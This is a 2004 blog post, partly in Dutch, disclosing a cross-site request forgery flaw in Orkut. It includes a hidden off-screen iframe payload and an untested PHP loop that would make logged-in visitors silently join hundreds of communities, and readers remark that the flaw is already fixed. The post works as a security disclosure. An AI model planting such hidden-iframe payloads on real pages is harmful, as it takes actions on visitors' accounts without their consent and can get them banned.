17 March, 2004

Orkut Security Problems

Te vinden onder: Uncategorized — @ 22:24

Aan al de Orkutjes outthere die het zou kunnen schelen:

A simple inline-frame, hidden in the browser by absolute-positioning it with negative values, can trigger the “add as friend” or “join community” command.

<iframe style="width:1px;
height:1px;
position:absolute;
top:-31337px;
left:-31337px"
src="http://www.orkut.com/Community.aspx?cmm=19657&cmd=add">
</iframe>

Another script shows how wrong it was for the Google-programmers to have GET requests become active like POST requests (as opposed to staying passive as is advised for them). If I would put the script on my site, my visitors who are still logged in to Orkut might be banned from Orkut because they join 300 communities at once.
PHP (untested) folllows:

<?
$i = 100;
while($i < 400)
{
echo "<iframe src=http://www.orkut.com/";
echo "Community.aspx?cmm=$i&cmd=add></iframe>";
$i++;
}
?>

Orkut Security Problem
Orkut Security Problem 2


reacties (3)


3 reacties, »

  1.   Reactie van Novecento , op 18 March, 2004 @ 2:20

    Orkut? Special spy from Mars or is it called Sedna ? Mystifying names i don’t trust.
    Orkut zuigt en mag kapot vallen.

  2.   Reactie van Juul , op 18 March, 2004 @ 19:47

    Dat is al weken oud en kan intussen niet meer :)

  3.   Reactie van Polski , op 18 March, 2004 @ 20:15

    Damn, en ik dacht eens op tijd te zijn.

RSS feed voor deze reacties. TrackBack URL

Voeg een reactie toe:

Powered by WordPress